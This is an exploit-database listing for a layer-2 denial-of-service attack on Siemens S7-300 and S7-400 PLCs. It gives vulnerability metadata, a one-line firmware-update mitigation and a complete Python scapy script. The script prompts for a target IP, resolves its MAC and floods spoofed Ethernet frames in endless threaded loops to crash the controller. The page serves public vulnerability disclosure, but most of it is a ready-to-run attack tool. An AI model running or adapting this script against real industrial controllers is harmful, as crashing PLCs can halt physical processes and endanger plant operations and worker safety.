Siemens S7 Layer 2 - Denial of Service (DoS)

vendor:

S7-300, S7-400 PLCs

by:

RoseSecurity

7.5

CVSS

HIGH

DoS

400

CWE

Product Name: S7-300, S7-400 PLCs

Affected Version From: Firmware versions >= 3

Affected Version To:

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Siemens S7-300, S7-400 PLCs

2021

Siemens S7 Layer 2 – Denial of Service (DoS)

This exploit is a denial of service attack against Siemens S7-300, S7-400 PLCs. It uses scapy to send a series of packets with a spoofed source MAC address to the target device, causing it to crash.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the Siemens S7-300, S7-400 PLCs are running the latest firmware version.

Source

Exploit-DB raw data:

# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Date: 21/10/2021
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs


#!/usr/bin/python3

from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re

# Banner

print(Fore.RED + r"""

 ▄▄▄· ▄• ▄▌▄▄▄▄▄      • ▌ ▄ ·.  ▄▄▄· ▄▄▄▄▄      ▄▄▄   
▐█ ▀█ █▪██▌•██  ▪     ·██ ▐███▪▐█ ▀█ •██  ▪     ▀▄ █· 
▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█  ▐█.▪ ▄█▀▄ ▐▀▀▄  
▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ 
 ▀  ▀  ▀▀▀  ▀▀▀  ▀█▄▀▪▀▀  █▪▀▀▀ ▀  ▀  ▀▀▀  ▀█▄▀▪.▀  ▀ 
▄▄▄▄▄▄▄▄ .▄▄▄  • ▌ ▄ ·. ▪   ▐ ▄  ▄▄▄· ▄▄▄▄▄      ▄▄▄  
•██  ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██  ▪     ▀▄ █·
 ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█  ▐█.▪ ▄█▀▄ ▐▀▀▄ 
 ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
 ▀▀▀  ▀▀▀ .▀  ▀▀▀  █▪▀▀▀▀▀▀▀▀ █▪ ▀  ▀  ▀▀▀  ▀█▄▀▪.▀  ▀
                """)

time.sleep(1.5)

# Get IP to exploit

IP = input("Enter the IP address of the device to exploit: ")

# Find the mac address of the device

Mac = getmacbyip(IP)

# Function to send the ouput to "nothing"

def NULL ():

    f = open(os.devnull, 'w')
    sys.stdout = f

# Eternal loop to produce DoS condition

def Arnold ():

    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()
def Sarah ():

    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()
def Kyle ():
    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()

# Arnold
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
NULL()

# Sarah

SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()

# Kyle

KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()